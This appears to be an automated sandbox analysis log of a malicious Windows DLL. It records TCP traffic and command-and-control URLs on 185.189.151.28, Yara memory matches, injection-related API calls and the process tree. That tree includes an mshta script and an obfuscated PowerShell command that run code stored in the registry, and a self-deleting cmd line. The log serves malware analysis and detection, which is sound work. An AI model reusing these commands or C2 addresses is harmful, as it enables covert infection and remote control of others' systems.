Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.189.151.28 |
Source: rundll32.exe, 00000003.00000003.393829384.0000000002E21000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/ |
Source: rundll32.exe, 00000003.00000002.501364119.0000000002E13000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/21j59p5h/aMY7pIvB814fHQzA54TmstP/6F84QjrY8T/SpaWCfEUD_2FnWXvC/rEqVxZeDiGm |
Source: rundll32.exe, 00000003.00000002.501297168.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/SE7WZ12eEzLDbcY/ReHD9U37IHMRdNMyX0/f61fYgNDH/xkc3DHorIjF18_2BtcDI/NMTbVOf |
Source: rundll32.exe, 00000003.00000003.403377940.0000000002E03000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.393803385.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.501297168.0000000002DBA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.403395449.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000002.501364119.0000000002E13000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.393793161.0000000002E03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.189.151.28/drew/cVbBCVAVC_2BrfCTTliq4D/TR89j_2FDMhBC/Rx3lDg61/HvgZB2J7R7VD_2FxHgth09P/H_2 |
Source: rundll32.exe, 00000003.00000003.393793161.0000000002E03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/drew/sfsR2EvFJVPpjzK/_2F3BoHT0GZYMOPHQ3/2aosaOv_2/FvhUxykM9XmRrxizW8RT/ |
Source: rundll32.exe, 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt |
Source: rundll32.exe, 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC: |
Source: rundll32.exe, 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://https://file://USER.ID%lu.exe/upd |
Source: explorer.exe, 00000019.00000000.606043556.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.491143563.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.471987520.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.mi |
Source: explorer.exe, 00000019.00000000.606043556.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.491143563.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000019.00000000.471987520.000000000D9F0000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://schemas.micr |
Source: Yara match | File source: 00000003.00000003.349012704.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348921870.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348876810.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.349079600.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.393934520.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.395608793.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.349095553.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348687637.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348979060.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.394913603.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348760397.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6240, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3172, type: MEMORYSTR |
Source: Yara match | File source: 3.2.rundll32.exe.4c70000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.4b994a0.7.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.4b994a0.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51c94a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51f6b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51f6b40.2.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000003.00000003.394753510.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.394820050.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.501779377.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.501664627.0000000004CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.500530669.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.349012704.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348921870.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348876810.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.349079600.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.393934520.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.395608793.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.349095553.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348687637.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348979060.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.394913603.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348760397.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6240, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3172, type: MEMORYSTR |
Source: Yara match | File source: 3.2.rundll32.exe.4c70000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.4b994a0.7.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.4b994a0.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51c94a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51f6b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51f6b40.2.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000003.00000003.394753510.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.394820050.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.501779377.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.501664627.0000000004CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.500530669.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04C7190C GetProcAddress,NtCreateSection,memset, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04C76D0A NtMapViewOfSection, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04C74321 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04C784C1 NtQueryVirtualMemory, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CB74AE NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CBC431 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC0782 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC00DC RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CCA806 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC61AE GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC2331 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CB64C4 memset,NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CB36BB NtGetContextThread,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CBB7D5 NtQueryInformationThread,GetLastError,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CBD77A NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CB10C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC3829 NtQuerySystemInformation,RtlNtStatusToDosError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC7950 NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CCEAC5 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC5220 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError, |
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 3_2_04CC5312 NtWriteVirtualMemory,VirtualProtectEx,RtlNtStatusToDosError,SetLastError, |
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll" |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1 |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1 |
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Exhe='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Exhe).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iwcfhbmkpt -value gp; new-alias -name yuxesb -value iex; yuxesb ([System.Text.Encoding]::ASCII.GetString((iwcfhbmkpt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nthaltvx.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3047.tmp" "c:\Users\user\AppData\Local\Temp\CSCFB39A903173B4FAEAF71F3E48EC5D0FF.TMP" |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zn133k50.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4508.tmp" "c:\Users\user\AppData\Local\Temp\CSC41D8DEC26D8340F3B72514D252AF5890.TMP" |
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\rXN8OIpbzz.dll |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1 |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\rXN8OIpbzz.dll",#1 |
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h |
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name iwcfhbmkpt -value gp; new-alias -name yuxesb -value iex; yuxesb ([System.Text.Encoding]::ASCII.GetString((iwcfhbmkpt "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nthaltvx.cmdline |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zn133k50.cmdline |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3047.tmp" "c:\Users\user\AppData\Local\Temp\CSCFB39A903173B4FAEAF71F3E48EC5D0FF.TMP" |
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4508.tmp" "c:\Users\user\AppData\Local\Temp\CSC41D8DEC26D8340F3B72514D252AF5890.TMP" |
Source: C:\Windows\System32\control.exe | Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\rXN8OIpbzz.dll |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5 |
Source: Yara match | File source: 00000003.00000003.349012704.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.448354217.00000000060D8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348921870.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348876810.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.349079600.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.393934520.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.395608793.000000000504C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 0000000E.00000003.453774507.0000027B6DC1C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.349095553.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348687637.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348979060.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.394913603.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.348760397.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 6240, type: MEMORYSTR |
Source: Yara match | File source: Process Memory Space: powershell.exe PID: 3172, type: MEMORYSTR |
Source: Yara match | File source: 3.2.rundll32.exe.4c70000.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.4b994a0.7.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.4b994a0.7.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51c94a0.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51f6b40.2.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.514a4a0.0.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51c94a0.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.51f6b40.2.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 3.3.rundll32.exe.514a4a0.0.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000003.00000003.394753510.000000000514A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.394820050.00000000051C9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.501779377.0000000004ECF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000002.501664627.0000000004CB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000003.00000003.500530669.0000000004B99000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX |
